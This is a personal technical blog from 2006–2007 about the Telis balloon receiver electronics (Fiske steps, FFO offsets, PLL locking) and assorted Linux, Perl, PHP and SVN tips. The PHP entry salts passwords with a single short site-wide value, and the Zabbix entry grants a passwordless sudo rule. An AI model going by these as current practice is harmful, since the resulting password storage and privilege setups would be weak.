
  remoteserver$ sudo killall dropbear
  remoteserver$ rm -rf dropbear-0.50

Note: it's not necessary to start dropbear with sudo. However, dropbear then can't read the root-only files needed for password authentication. The only authentication possible is key-based, with a key in ~/.ssh.
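
If you do go the non-sudo route, the key setup could look something like this (a sketch; the key file names are made up):

  localmachine$ ssh-keygen -t rsa -f ~/.ssh/tmpkey
  localmachine$ ssh remoteserver 'cat >> ~/.ssh/authorized_keys' < ~/.ssh/tmpkey.pub
  remoteserver$ ./dropbear -p 31337 -r ./key.rsa
  localmachine$ ssh -i ~/.ssh/tmpkey -p 31337 remoteserver

An unprivileged dropbear can only log you in as the user that started it, which is fine for this purpose.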

2007-08-09 Fiske steps

I've previously explained the SIR chip, so I'll keep it short and say that currently, we're implementing a procedure to automate the setting of the frequency with which the FFO (Flux flow oscillator) beams.

This frequency is determined by the voltage that's set on the FFO. If you multiply that voltage by the Josephson constant (483 597.9 * 10^9 Hz V^-1), you get the frequency.

But we can't set that voltage straight away. We first set the FFO current, then measure the resulting voltage to see if we're on the right track.

There are two circumstances here. On the one hand, we have a Josephson junction (a special superconducting circuit); the SIR chip's temperature is brought to about 2 kelvin. On the other hand, a magnetic field envelops the FFO. That is due to the control line, a conducting line which is etched below the FFO on the SIR chip. When we set a current on the control line, a magnetic field results.

When you combine these two circumstances at a certain FFO bias voltage (and thus a certain frequency), Fiske steps can occur. From what I've gathered so far, a Fiske step is a certain voltage range that cannot occur when you set a certain current and a certain magnetic flux on a circuit. 1)

So my electronics colleague created a macro, which is a list of instructions for the Telis FPGA. This procedure does the following:

  1. Determine which frequency we need; using Josephson constant, determine FFO voltage
  2. Establish a lower and an upper boundary voltage in which we will search
  3. Set the FFO control line current
  4. Set FFO current
  5. Read FFO voltage
  6. Compare readout with the wanted FFO voltage
  7. If it's too big: quit
  8. Start lower boundary loop (see below)
  9. Decrease FFO current in small steps, reading out FFO voltage; we probably skipped the lower boundary and want to get close to it
  10. Start upper boundary loop (see below)

Lower boundary loop:

  1. Increase FFO current in large steps
  2. Read back FFO voltage
  3. Continue until we've passed the lower boundary

Upper boundary loop:

  1. Increase FFO current in small steps
  2. Read back FFO voltage
  3. Continue until we've passed the upper boundary

We now have a set of points. These must be looked at to see whether we need to choose a new value for the FFO control line and whether the procedure must be started again.
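
To make the flow concrete, here is a rough sketch of the search in Perl. Mind that this is purely illustrative: the real procedure is an FPGA macro, and the helper functions, variables and step sizes below are invented.

  # Illustrative sketch of the boundary search; not the actual macro.
  # set_ffo_control_line(), set_ffo_current() and read_ffo_voltage()
  # are invented helpers; $frequency, $margin, $cl_current, $start and
  # the step sizes are assumed to be set elsewhere.
  my $target = $frequency / 483.5979e12;    # wanted FFO voltage in volts
  my $lower  = $target - $margin;           # lower boundary
  my $upper  = $target + $margin;           # upper boundary

  set_ffo_control_line($cl_current);
  set_ffo_current($start);
  exit if read_ffo_voltage() > $upper;      # too big: quit

  my $i = $start;
  while (read_ffo_voltage() < $lower) {     # lower boundary loop:
      set_ffo_current($i += $large_step);   # large steps up
  }
  while (read_ffo_voltage() > $lower) {     # we probably overshot it;
      set_ffo_current($i -= $small_step);   # creep back in small steps
  }
  my @points;
  while (read_ffo_voltage() < $upper) {     # upper boundary loop:
      set_ffo_current($i += $small_step);   # small steps up, saving points
      push @points, [ $i, read_ffo_voltage() ];
  }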

Below is the output of the oscilloscope, where the X-axis displays time and the Y-axis the FFO voltage. This is a test situation where a simple resistor is used instead of the FFO.

FISKE Steps test 01 small.jpg

Larger picture

Footnotes:
1) Problematic in this case is that there is some hysteresis. If you lower the FFO control line, other Fiske steps occur. If you raise it again to the previous level, the Fiske steps are not the same anymore. So you'll have to steadily work your way down, assessing the merits of each control line setting and stopping when you think you've reached a correct setting.

2007-08-05 Adding salt to Auth class

If you're using PHP, you probably use or at least know of the PEAR classes at http://pear.php.net/. It's a pretty large set of classes providing lots of standard functionality. Amongst these is the Auth class, which gives you a perfect start if you need username/password screens for your application. What this class is missing is a function for adding salt to passwords. Use the simple class below to add this.

 <?php
 include_once 'Auth.php';
 include_once 'config.php';
 class MyAuth extends Auth
 {
     function assignData()
     {
         // Pull in the site-wide salt from config.php; without this
         // declaration, $mysalt would be empty inside the method.
         global $mysalt;
         parent::assignData();
         $this->password = $mysalt . $this->password;
     }
 }
 ?>

Save the above code in a file called MyAuth.php and instead of including Auth in your login script, use MyAuth. Also create a file called config.php and add the variable $mysalt. It should contain two or three characters, something like:

 $mysalt = 'wd3';

The salt must also be prepended to each password when you save it in the database. This code is public domain.

To understand the usefulness of salt, see Wikipedia's entry on password salt.

2007-06-22 Configuring ZABBIX and IPMI

Recently I installed RedHat AS 5 on a PowerEdge 860. For management, we use Zabbix; if you know Nagios, this is supposed to be a more user-friendly replacement. I figured out how to configure Zabbix to read out fan speed, board temperature, etc.

To read out IPMI sensor values with Zabbix (http://www.zabbix.org/) take the following steps:

On the zabbix server, use the web frontend (menu Configuration -> Items) to create a new item "ipmi.planar_temp" of type "ZABBIX Agent (Active)". Type of value is Numeric, unit is C for Celsius.

Go to the zabbix agent machine. Give the zabbix user sudo rights (as root, execute "visudo") to execute ipmitool as root, without a password.

Example line to add:

 zabbix ALL=(ALL) NOPASSWD: /usr/bin/ipmitool sdr

Edit the /etc/zabbix/zabbix_agentd.conf file and add the following line (all on one line):

 UserParameter=ipmi.planar_temp,sudo ipmitool sdr | grep "Planar Temp" | awk '{print $4}'

Restart the agent:

 # service zabbix_agentd restart

Go to the zabbix server. Restart it (don't know if this is necessary):

 # service zabbix_server restart

Go to the zabbix server web frontend, menu Monitoring -> Latest Data.
Scroll down. The following line should be shown after a minute or so:

 ipmi.planar_temp        22 Jun 08:19:25        26 C

At the end of the line, there's a hyperlink to a pretty stripchart.

You can add new lines as you wish, repeating the steps above. The PE860 doesn't show a whole lot of IPMI information. For interested parties, here is my zabbix_agentd.conf:

[zabbix_agentd.conf]

Note that last line: basically, I count all lines that do NOT end in either 'ok' or 'ns'.
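
As an illustration, such a counting line could look like the following (a reconstruction; the real one is in the file linked above):

 UserParameter=ipmi.problems,sudo ipmitool sdr | egrep -cv "ok$|ns$"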

Also note that this is a test setup. The sudo construction could be tighter.

2007-03-12 Better measurement

In the previous entry, I talked about correcting offsets when measuring with the FFO board. We've also made an improvement in the measurement itself. The ADC has lots of options, amongst them one that takes more time per measurement. The ADC always takes multiple samples and then takes the mean (this might be a bit simplified). Allowing more time results in more samples and thus a more reliable mean. When plotted, the difference was really noticeable:

better res.png

The jagged line is the fast measurement mode, the smooth line is the mode where more time is taken. It's a tradeoff, naturally.

2007-03-11 Bug in software or hardware

This week was a very rewarding week: we squashed a bug which seemed to elude the very best minds -- those of the Telis team.

The problem was that when measuring a voltage, we read out the wrong value. We're reading very accurately, in the microvolt (uV) scale and this is done with an electronics board which incorporates an ADC. When we made sure that no current was running on the measured circuit, we tried to measure zero but we actually got -14 uV. On this scale that isn't something to worry about; besides the ADC there are more electronic components on the board and these can all account for a slight offset. Hell, on this scale even the temperature can play a role.

However, this ADC has a lot of options and one of them is a procedure to measure an offset and store it in a register. Further reads will then take this offset into account. The electronics guy had created a script for this purpose. I had incorporated the script into a nice Perl module with a button in the user interface named 'Measure Offsets'. I've previously described this procedure in 2006-10-20 Measuring FFO offsets.

So, we ran the procedure and did a new measurement. The offset changed, but didn't disappear. Hmm, strange. Now we measured -7 uV. Weird!

FFO plot offset correctie zichtbaar.png

First we tried the usual stuff, to make sure this faulty reading was repeatable: turning off the electronics, disconnecting cables, reconnecting, turning on again. Trying an older version of the software. Completely reproducible. Then it was time to start thinking.

We tried to determine the location of the problem. Is it the hardware, the software, or the hardware instructions loaded into the flash located on the electronics board?

The measurement is run from the FFO board:

FFO-pll top.jpg

Our electronics guy tried the spare FFO board. Fully reproducible faulty behavior. So, it's not the hardware. Then it must be the software, right?

We reran the old script from which the Measure Offsets Perl module was created. This script ran the offset procedure for the ADC and then did some measurements. These checked out fine, printing zero uV after the offset procedure. However, if we then walked to the main software screen and read out the value, it had the -7 uV offset again. Can we rule out the software then?

We compared the Perl module and the original script line by line. These were the same. We also checked what each line did. They were created some time ago and we wanted to make sure everything still made sense.

Then we realized that there was a difference between a readout in the original Measure Offsets script and a readout in the main software screen. The second one uses a macro, the hardware instructions loaded into the flash on the electronics board. This macro first puts the ADC in high-resolution mode before making the measurement.

So we changed the Measure Offsets procedure to first set the ADC to high-resolution mode before doing the offset procedure. Then we reran the measurement and waited with fingers crossed... and bingo! That was the problem. When we reran the plot, the following picture appeared:

offset fixed.jpg

The left line is the measurement before we ran the offsets procedure; the right line is the corrected measurement. (Note that the lines aren't as jagged as in the first plot -- that is because the ADC was set to a higher accuracy, which takes more time per measurement.)

Turns out it wasn't a hardware problem. It wasn't a software problem, either. It wasn't even really a problem in the macros. We just didn't use the offset options of the ADC in the right way. It was fully tested, but not in the exact same way measurements were taken later.

This type of bug had evaded unit testing and could only be caught with good testing in the field. Can't beat that kind of testing.

2007-02-02 Branching in SVN with existing work

This week I had the situation where I was asked to come to another office (in Groningen) to do some testing and fixing of the software. The revision running there was 590, while I was in the middle of an integration effort, going up to release 605. I couldn't bring the current, broken code, but some work needed to be done at the Groningen office, with revision 590.

(Note: we usually install a revision including source and build it on the spot, so the revision 590 source was present in the Groningen office.)

So, I went there and did some testing, fixed problems, etc. When I came back, bringing the source with me, I was in the classic situation where you started hacking and decided afterwards that creating a branch would've been a good idea. To do this, first create a patch of all your changes:

  $ cd your/current/project/directory
  $ svn diff > ~/hackwork.patch

Then find out what revision you are hacking:

  $ svnversion .
  590M

Now create a separate branch of the original version:

  $ svn copy http://subversion.company.com/svn/telis/tuce \
    http://subversion.company.com/svn/telis/tuce-branch-gron \
    -m "Creating separate branch for work outside integration efforts"
  Committed revision 606.

Go to another directory, in my case ~/workspace

  $ cd ~/workspace
  $ svn co http://subversion.company.com/svn/telis/tuce-branch-gron
  $ cd tuce-branch-gron

And now integrate your changes again, and commit them in the branch:

  $ patch -p 0 < ~/hackwork.patch
  patching file tdb/mysql-telis.sql
  patching file client/python/plotffo.py
  ... lines removed ...
  $ svn commit -m "Fixes made on colors in FFO plot, conversion housekeeping \
  macro different, conversion FFO plot corrected"
  Sending        client/perl/lib/FFO_sweep_macro.pm
  Sending        client/perl/lib/PLL_sweep_macro.pm
  ... lines removed ...
  Sending        tdb/mysql-telis.sql
  Transmitting file data ...............
  Committed revision 609.

Voilà, a separate branch is created.
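
Should you later want these fixes in the trunk as well, a merge along the following lines would do it (a sketch; the working copy path is made up, the revision numbers are from the example above):

  $ cd ~/workspace/tuce-trunk          # an up-to-date trunk working copy
  $ svn merge -r 606:609 \
    http://subversion.company.com/svn/telis/tuce-branch-gron
  $ svn commit -m "Merged Groningen fixes from tuce-branch-gron"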

2007-01-09 Battery problem

One of the current problems in the project is the battery pack. According to the electronics man, it's a small problem, and he explained it as follows: the battery pack consists of a bunch of lithium-ion non-rechargeable batteries, custom made by an American company. The batteries come with a specification saying they deliver up to a certain voltage at a certain temperature. The spec sheet shows a curve; the lower the temperature, the lower the voltage. At room temperature the batteries give around 3.8 V, but the Telis electronics have to operate on a balloon, whose trajectory will take it through parts of the atmosphere with temperatures between -19 and -70 degrees Celsius.

This is a much broader range than what's usual for electronics on a satellite. Once these are packed in isolation, the temperature range is quite small.

The problem is now that tests show the batteries don't deliver up to spec at temperatures around -40 degrees Celsius and possibly lower. The electronics man thought up a solution which involves a second battery pack. Together with a temperature sensor in a control loop, the second pack makes certain that the main battery pack (feeding the electronics) is kept at the right temperature. It must now be checked that there is enough room above the electronics casing in the frame that's carried by the balloon.

2006-12-07 Electronics interface for Telis

When I want to read out the settings from the electronics boards of the Telis project, I have multiple choices.

  • First is to just query one parameter
  • Next is to run one of the so-called housekeeping macros which basically lets the FPGA query a bunch of parameters and return the results in one big chunk
  • Third is to query a special virtual setting

That last option actually involves querying the "func" board. This board has ID number 0. It's loaded into the server upon startup and actually runs some Perl code that's defined in the database. The Perl code mostly just maps straight through to settings on other boards; however, it can be used to create a simple interface to the more involved settings.

It's a very flexible setup to control a piece of custom hardware.

What's a bit of a shame is that some settings actually need to be combined. All settings are 16 bits; however, one ADC returns 20-bit values, and these need to be retrieved using two settings.

The database with parameters, however, maps one-to-one. So we work around this using a parameter on the "func" board: you query the func parameter, which runs some Perl that actually queries the two underlying parameters, combines them and returns the result.
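
As an illustration, the Perl behind such a func parameter might boil down to something like this (the helper and parameter names are invented):

  # Combine two 16-bit reads into one 20-bit ADC result (sketch).
  my $high = query_setting('adc_result_high');   # upper 4 bits
  my $low  = query_setting('adc_result_low');    # lower 16 bits
  return (($high & 0xF) << 16) | ($low & 0xFFFF);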

2006-11-16 Checking form fields

When you're creating dynamic web pages with forms on them, you probably won't forget to validate the values that the user typed into a text box. But will you also check which values come in from a selection box?

You probably won't. After all, the user can't edit those values. Novell certainly doesn't. Novell has a piece of software called Webmail, so users can read their mail using their favorite browser instead of the Novell client.

That's useful. Using Webmail, users can also define server-side e-mail rules, for instance to automatically move incoming e-mails from a mailing list to a specific folder. Most mailing lists put a specific piece of text in the subject, but others can only be recognized by the e-mail address of the list, which is in the To: or CC: field.

create rule novell webaccess.png

Except... with Webmail, the only fields you can pick are "From", "To", "Subject" and "Message" (body). This is a non-editable select box.

Except it's editable. This can be done with any programmable web client, such as the libwww-perl module. Alternatively, Firefox has the webdeveloper extension, which can turn select fields into text fields.
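
For example, with libwww-perl a submission with a field value the form never offered could be sketched as follows (the URL and form field names are made up):

  #!/usr/bin/perl
  use strict;
  use LWP::UserAgent;

  my $ua  = LWP::UserAgent->new;
  my $res = $ua->post('http://webmail.example.com/createrule', {
      field    => 'CC',                   # not offered by the select box
      contains => 'somelist@example.org',
  });
  print $res->status_line, "\n";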

create rule novell webaccess2.png

Novell's Webmail application luckily doesn't validate these fields. So all of a sudden, we have an extra feature where we can sort out e-mails according to the contents of the CC: field.

create rule novell webaccess3.png

Useful when you're on a dating site and you're not looking for the (boring) choices of Male or Female, but -- say -- Muppet.

On a serious note, your web development framework should provide automatic checks for this. For instance, PHP's PEAR classes contain the HTML_QuickForm class, which can programmatically build HTML forms and (amongst hundreds of other features) nicely checks that submitted values don't deviate from the possible selections.

2006-10-23 Keeping an eye on logs

When developing, you often want to keep an eye on several logs at a time. gnome-terminal is ideal for this, with its multiple tabs. To fire up one terminal with several named tabs at once, adapt the following shellscript and save it to a file called 'logwatch' or something.

  #!/bin/sh
  gnome-terminal \
  --window --title="Apache log" \
  -e "ssh sron0311 tail -f /var/log/apache/error_log" \
  --tab --title="messages" \
  -e "ssh sron0311 tail -f /var/log/messages" \
  --tab --title="Apache mod_perl log" \
  -e "ssh sron0311 tail -f /home/apache_mod_perl/apache/logs/error_log"

Basically, each tab consists of a line where the title is set and a line where the command is set to view the logfile. Of course, the first tab to be opened is a complete window, not a tab.

Instead of --window or --tab, it's possible to use the --window-with-profile=... or --tab-with-profile=... option to set a particular profile for logging. You could give these windows/tabs a special background color to set them apart from the other terminals.

gnome-term-logging.png

2006-10-20 Measuring FFO offsets

The electronics man of the Telis project came up with a script to measure any offsets in the DACs and the ADC that set inputs and read measurements on the FFO (Flux Flow Oscillator).

The ADC that's used has many possibilities. It has four channels and, for each of those, a register to which an offset can be written.

measuring ffo offsets.jpg

The script measures the offsets in four steps (noted in red on the schema):

  1. The FFO bias channel is set to an internal dummy resistance. ADC channel III (ch III on the schema) should not measure any current (i.e. read 0). It probably reads somewhat above or below zero, so the script notes this first offset and writes it to the offset register in the ADC, so future measurements take it into account.
  2. The first DAC (the upper one in the picture) is set to 0 mV. This time, ADC channel I shouldn't measure any current. Again, there's probably an offset, but the script only notes this internally; this DAC doesn't have registers to save an offset.
  3. For the second (lower) DAC, we don't have any way of measuring an offset. However, for ADC channel II the precision is not as important as for ADC channels I and III. We simply assume that the offset is the same as the first DAC's.
  4. With the second DAC's offset assumed, we measure the offset on ADC channel II and write it to the appropriate register on the ADC.

Note that the ADC can measure the offsets itself, but in this case that can't be used: there are amplifiers just outside of the ADC that are not drawn in the schema above. These can have an offset as well, and this is taken into account by the above-mentioned script.
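
Purely as an illustration of the four steps, a sketch (all helper names are invented; the real script drives the electronics):

  switch_ffo_bias_to_dummy();             # step 1: internal dummy resistance
  write_adc_offset(3, read_adc(3));       # ch III should read 0; store offset

  set_dac(1, 0);                          # step 2: first DAC to 0 mV
  my $dac1_offset = read_adc(1);          # noted in software only; this DAC
                                          # has no offset register
  my $dac2_offset = $dac1_offset;         # step 3: assume the same offset

  set_dac(2, -$dac2_offset);              # step 4: cancel the assumed offset,
  write_adc_offset(2, read_adc(2));       # then store the ch II offset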

2006-10-17 Gigabit network cards

At work, Tiemen Schut tested the performance under Linux for two Gigabit network cards, a D-Link DGE-550SX (optical) and an Intel Pro/1000 GT (standard Cat5e).

While the throughput is the same, the CPU usage differs considerably. Both Linux drivers allow setting some parameters for generating as few interrupts as possible. The difference:

                       CPU usage   Number of interrupts
  Intel Pro/1000 GT    30%         5,000
  D-Link DGE-550SX     80%         23,000

To recreate the test:

  • Start ksysguard
  • Create a new tab
  • In the left pane, click open Localhost > CPU Load > Interrupts
  • Drag the 'Total' to the new tab
  • Start a heavy network session, perhaps FTP'ing a large file
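
The interrupt moderation parameters themselves can be inspected and changed with ethtool, driver permitting; the values below are just an illustration:

  # ethtool -c eth0                  (show current coalescing settings)
  # ethtool -C eth0 rx-usecs 100     (delay RX interrupts by up to 100 us)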

2006-10-05 Character set encoding

Today, I received an e-mail from Amazon:

  From: "Amazon.co.uk" <auto-shipping@amazon.co.uk>
  Subject: Your Amazon.co.uk order has dispatched
  Content-Type: text/plain; charset=ASCII
  MIME-Version: 1.0
  
  Greetings from Amazon.co.uk,
  
  We thought you would like to know that the following item has been sent 
  to:
  
  <<< cut out some uninteresting parts >>>
  
  Ordered  Title                          Price  Dispatched  Subtotal  
  ---------------------------------------------------------------------
  Amazon.co.uk items (Sold by Amazon.com Int'l Sales, Inc.):
  
     1     Salsa [Box set]                  £8.09      1    £8.09

My Mozilla mail program was showing the pound sign as follows:

char encoding amazon.png

Now why does it show the pound sign as a funny question mark? It's because the e-mail header says it should do so (emphasis mine):

Content-Type: text/plain; charset=ASCII

That's right, ASCII. Which is a seven-bit character encoding, which does not include the pound sign. Solution? Go to menu View -> Character Encoding -> Western (Windows-1252) (or ISO 8859-1). And the pound sign is shown.

Another fine example of a programmer who didn't understand what a character encoding was and basically just tried to ignore the whole issue and stick with ASCII. It's even spelled the wrong way (the standard prefers US-ASCII).
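
The fix on the sending side is a one-line change to the mail header, for instance:

  Content-Type: text/plain; charset=ISO-8859-1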

Q&A probably didn't caught this because they test on a Windows machine with Outlook or Outlook Express, completely forgetting about Apple's, Linux boxes, and Windows machines which don't have the character set by default set to Windows-1252 but to some other language like Russian.

This whole post sounds a bit pedantic; however, I find it strange that in the 21st century, someone can afford to stick his head in the sand and pretend that the whole world still uses ASCII.

2006-10-04 Mod perl and Slackware part 2

The previous day, I thought I had Apache with mod_perl working on Slackware 10.2, but alas, funny segfaults all over the place. This time, I installed mod_perl in a completely separate user account and it works.

As root, create a user:

        # useradd -g users -m -s /bin/bash apache_mod_perl
        # passwd apache_mod_perl

Login as the new user, then:

        $ mkdir bin lib perl_modules
        $ wget http://search.cpan.org/CPAN/authors/id/L/LD/LDS/CGI.pm-3.25.tar.gz
        $ tar xfz CGI.pm-3.25.tar.gz
        $ cd CGI.pm-3.25/
        $ perl Makefile.PL PREFIX=$HOME
        $ make && make install

Add the following line to .bash_profile:

        export PERLLIB="$PERLLIB:$HOME/lib/perl5/5.8.6:\
        $HOME/lib/perl5/site_perl/5.8.6"

And logout/login.

        $ mkdir -p $HOME/.cpan/CPAN
        $ cp /usr/lib/perl5/5.8.6/CPAN/Config.pm .cpan/CPAN/
        $ vi .cpan/CPAN/Config.pm

Edit the file and change all paths with 'home' in them to the home directory of the current user (apache_mod_perl). Also change line:

        'makepl_arg' => q[],

to:

        'makepl_arg' => q[PREFIX=/home/apache_mod_perl],

Save and exit, and install any additional Perl modules your application needs. In our case, we typed:

        $ perl -MCPAN -e shell
        cpan> install XML::Simple IPC::Cache
        cpan> quit
        $ mkdir ~/src
        $ cd ~/src
        $ wget http://ftp.bit.nl/mirror/slackware/slackware-10.2/source/n/apache/apache_1.3.33.tar.gz
        $ wget http://perl.apache.org/dist/mod_perl-1.0-current.tar.gz
        $ tar xfz apache*
        $ tar xfz mod*
        $ cd mod*
        $ perl Makefile.PL PREFIX=$HOME APACHE_PREFIX=$HOME/apache \
          APACHE_SRC=../apache_1.3.33/src DO_HTTPD=1 USE_APACI=1 EVERYTHING=1
        $ make && make install && cd ../apache_1.3.33/ && make install

Now edit /home/apache_mod_perl/apache/conf/httpd.conf and:

  • (if you're resource-bound) change StartServers to 2, MinSpareServers to 1, MaxSpareServers to 3
  • Change User to apache_mod_perl and change Group to users

Save, exit and edit ~/.bash_profile. Add the following line:

        export PATH=$HOME/apache/bin:$PATH

Logout and login. Type:

        $ apachectl start
        $ cat apache/logs/error_log

It should say something like:

        "Apache/1.3.33 (Unix) mod_perl/1.29 configured"

You want users to be able to execute Perl scripts. Edit ~/apache/conf/httpd.conf and add the following lines at the end (only do this if you know each and every option below and understand the security risks):

  # Line below checks all modules for changes, only necessary for development
  PerlModule Apache::StatINC
  <Directory /home/*/public_html>
    Options MultiViews Indexes FollowSymlinks ExecCGI
    <Files *.pl>
      SetHandler perl-script
      PerlHandler Apache::Registry
      Options ExecCGI FollowSymLinks
      allow from all
      PerlSendHeader On
      # Line below checks all modules for changes, only necessary for development
      PerlInitHandler Apache::StatINC
    </Files>
  </Directory>

To set the directory for modules:

  <Directory /home/someuser/public_html>
    PerlSetEnv "PERL5LIB" "/home/someuser/src/project/perl/lib"
  </Directory>

Restart apache with:

  $ apachectl restart
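
For a first test, something like the following will do (an illustrative script; save it as ~/public_html/thescript.pl and make it executable):

        #!/usr/bin/perl
        use strict;

        # PerlSendHeader On lets us print our own header
        print "Content-type: text/plain\n\n";
        print "Running under: ", $ENV{MOD_PERL} || "plain CGI", "\n";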

Go to http://localhost:8080/~someuser/thescript.pl and be astounded.

2006-10-03 Mod perl and Slackware

Note: these steps are obsolete. In the comments, McDutchy points out a much easier way. This is much less work and also doesn't require any packages to be reinstalled.

Slackware 10.2 doesn't include mod_perl. To install this package while staying as close to the original Slackware installation, we're going to compile mod_perl using the patched Apache that's particular to Slackware.

First we download Slackware's Apache source and mod_perl. Download all the Slackware files from your favorite mirror. Also download mod_perl and put it in the same directory.

Edit the Slackware build script apache.SlackBuild. Add the following line after line 26:

 tar xvzf $CWD/mod_perl-1.0-current.tar.gz

Before the comment line that says "# build apache", insert the following lines:

  # build mod_perl
  cd $TMP/mod_perl-1.29
  perl Makefile.PL \
    APACHE_SRC=../apache_1.3.33/src \
    NO_HTTPD=1 \
    USE_APACI=1 \
    PREP_HTTPD=1 \
    EVERYTHING=1
  make
  make install

Finally add the following line after the ./configure options of Apache:

  --activate-module=src/modules/perl/libperl.a \

As root, execute the Slackware build script. When it's done, install the resulting package:

  # sh ./apache.SlackBuild
  # installpkg /tmp/apache-1.3.33-i486-1.tgz

If any question comes up, accept the default. After installation, you may also need to add the following lines to the file /etc/apache/httpd.conf:

  LoadModule perl_module        libexec/apache/libperl.so
  AddModule mod_perl.c

2006-09-19 PLL IF curves

The electronics man of the Telis project has created a new macro (a set of instructions in the flash memory of the Telis FPGA). The macro repeatedly steps up the harmonic mixer bias voltage and then varies (sweeps) the power of the LSU, the Local Source Unit.

I'm busy making a 3D plot of the result of this macro. It should look like this:

 LSU power (dBm)
   |
   |
   |
 15|---------------
   |
 10|---------------
   |
  5|---------------
   |_____________________
   0                 Harmonic Mixer Bias Voltage

The lines at 5, 10 and 15 dBm must be colorized to indicate the PLL IF level. This is an output of the PLL, a voltage that indicates the level of the IF signal.

2006-09-14

Yesterday we worked in the lab in Groningen until 21:15, and my colleague got his macro working (a 3 Mb movie):

pll optimization.avi

These macros are quite interesting: they're stored in on-board flash and run on the FPGA. This FPGA has grown and grown in functionality until it could run lists of instructions which can be nested and have loops in them.

2006-07-03 PLL locking

If you've seen the previously posted video, you might wonder what happened. What was shown was a spectrum analyzer displaying a 100 MHz wide spectrum of the output of the PLL; the Y-axis displays the intensity. The center was set to 400 MHz. The arc is noise, and you can see a spike travel from right to left, see below:

pll locking1.png

The travelling is caused by changing the FFO (flux flow oscillator) control line. When we find the FFO control line setting where the power of the PLL signal is at its maximum, we remember that setting.

As I explained in 2006-04-25 SIR acronym, the FFO is a voltage-controlled oscillator. If you keep the complete schema in mind (hm ffo pll schema.png), you'll see that the signal the FFO sends is mixed by the harmonic mixer (HM) and ends up in the PLL again.

Below, a little schematic is shown which basically highlights the upper part of the complete schema hm ffo pll schema.png. The LSU (Local Source Unit) sends a signal of about 20 GHz into the harmonic mixer, and the power with which this is done can be regulated. This influences the harmonic frequencies at the right: the length of the spikes says something about the power, and altering the LSU power influences the length of particular spikes.

pll locking2.png

Another knob we can fiddle with is the bias of the HM. The bias is important because it controls the way the HM mixes the signals from the LSU and FFO. If you'd draw an I/V curve of the HM, it would look something like this:

ffo iv curve.png

You don't want to set the bias voltage so high that the line is linear, because then it would act as a resistor and resistors don't mix signals. Instead, the bend in the lower-right is the best setting (at around 2.5 mV).

The schematic below highlights the lower-left part of the schema hm ffo pll schema.png. We get the phase difference as a voltage which the electronics can read out. We need this because we want it to be 0 volts before we turn the PLL gain higher.

pll locking3.png

2006-06-29

For your viewing pleasure, a camera was aimed at a spectrum analyzer. It shows a macro being run that fine-tunes the FFO and then locks with the PLL. It's about 3.5 Mb.

telis pll locking macro.avi

Quote of the day:
Ed: "In theory, nothing works and we know why. In practice, it works and we don't know why."
Pavel: "Yeah and we're working in between: in practice, it doesn't work and we don't know why."

2006-06-19 Making FFO plots

We want to make an I/V curve of the flux flow oscillator (FFO), including a third dimension to express the power with which the FFO is beaming. See below for an example plot.

2006-05-30 PLL optimization

The electronics man of the Telis project wrote a couple of routines so the PLL can be finetuned automatically. This means finding the maximum in a curve. Below is a hardcopy of the scope readout:

PLL-optimizer-testresults.JPG

2006-04-27 Perl modules and CGI

Suppose you have a bunch of Perl scripts and modules. The modules have differing versions and you don't want to hardcode the path in the scripts. A few of the scripts also run through CGI.

The solution is to set the PERLLIB environment variable for the scripts that are run on the commandline. Point the variable to the directory where you install the particular version of the modules. You could add the following lines in $HOME/.bash_profile:

  # separate multiple directories with a colon.
  export PERLLIB="$HOME/lib/mymodules-rev316"

This can be done for different users on one Unix machine, i.e. if you're testing under user "test-rev316", you'll use the above line. If you're a developer, set it to the directory containing the checked-out source.

For the CGI scripts, the same can be done. Put a line like this in Apache's httpd.conf file:

  # separate multiple directories with a colon.
  SetEnv PERLLIB "/home/bartvk/lib/mymodules-rev316"

This variable can be placed between <Directory> tags, so again different users on one Unix machine can have different values:

  <Directory /home/test-rev316/public_html/cgi-bin>
    SetEnv PERLLIB "/home/test-rev316/lib/mymodules-rev316"
    Options ExecCGI
    SetHandler cgi-script
  </Directory>
  <Directory /home/bartvk/public_html/projectWorldDomination/cgi-bin>
    SetEnv PERLLIB "/home/bartvk/src/projWorldDom/client/perl/lib"
    Options ExecCGI
    SetHandler cgi-script
  </Directory>

You could even do fancy things with the SetEnvIf directive, where you set PERLLIB according to the URL that comes in; see the sketch below. Generally though, the above will be OK.
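
A sketch of such a line (untested; the URL pattern is invented):

  # set PERLLIB based on the incoming URL
  SetEnvIf Request_URI "^/test-rev316/" PERLLIB=/home/test-rev316/lib/mymodules-rev316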

Don't fall into the trap of delaying the hassle! Sooner or later, another developer will take over the project and will want to leave the current code as is, and continue in another account. If all scripts and modules assume a particular directory layout, this will mean a fair bit of coding and testing before the new developer is up-to-speed.

2006-04-25 SIR acronym

In the previous entry, I mentioned that the acronym SIR stands for Superconducting Integrated Receiver. What I didn't explain is what it actually means.

First the superconducting part: when you want to measure a very weak signal, at some point the electronic noise will interfere with your measurement. This noise is caused by small variations in temperature. The lower the temperature, the lower the electronic noise. Hence very sensitive instruments need to be supercooled.

Now the receiver part: the signal which is measured is between 500 and 750 GHz. This frequency sits between radio signals and light; you can use optics as well as antennas. The SIR chip uses a very tiny double dipole antenna which is etched onto the chip. A silicon lens is used along with mirrors to guide the signal onto the chip's antenna. Note that although the signal can be put on a wire, it will fade out very quickly. That's why the SIS mixer is located right below the antenna.

Finally, the "integrated" part of the acronym. The chip contains a SIS mixer as well as the aforementioned antenna. Two signals are mixed: the one from the antenna and another one from the FFO, the flux flow oscillator. This is a voltage-controlled oscillator.

This FFO is also integrated on the SIR chip, and generates a set signal between 500 and 650 GHz, the frequency we want to measure at. The fourth and final part on the SIR is the Harmonic Mixer (HM), which receives the FFO-generated signal and mixes it with a 20 GHz signal to get a signal that looks like the black one below:

hm frequency.png

On 2006-02-23 Pictures from TELIS Project, I showed the boards, of which the rightmost one is the LSU board. This board generates a number of signals. It contains an ultra-stable 10 MHz crystal oscillator, sitting in a nice warm little oven to keep it happy.

One LSU signal has a frequency of 20 to 22 GHz with a certain power, which is fed into the Harmonic Mixer. This is called pumping the mixer. It is mixed with the FFO signal by the HM to get what you see above: a signal with a frequency of, say, 650 GHz together with one that's 4 GHz above it -- that's the red signal in the picture above.

The resulting signal from the HM is sent into the SIS mixer as the F1 signal shown in the sketch of the previous entry, 2006-04-24 SIRs for dummies. It's called a harmonic mixer because whatever signal f you put in, out come signals at 2f, 3f, 4f, et cetera. The LSU input signal is chosen to get the required frequency of around 650 GHz, or whatever the spectrum is that we want to view. We use the 30th harmonic for this, so the LSU signal would be set to around 21.8 GHz.

Below is a bigger schematic picture of what's happening.

hm ffo pll schema.png

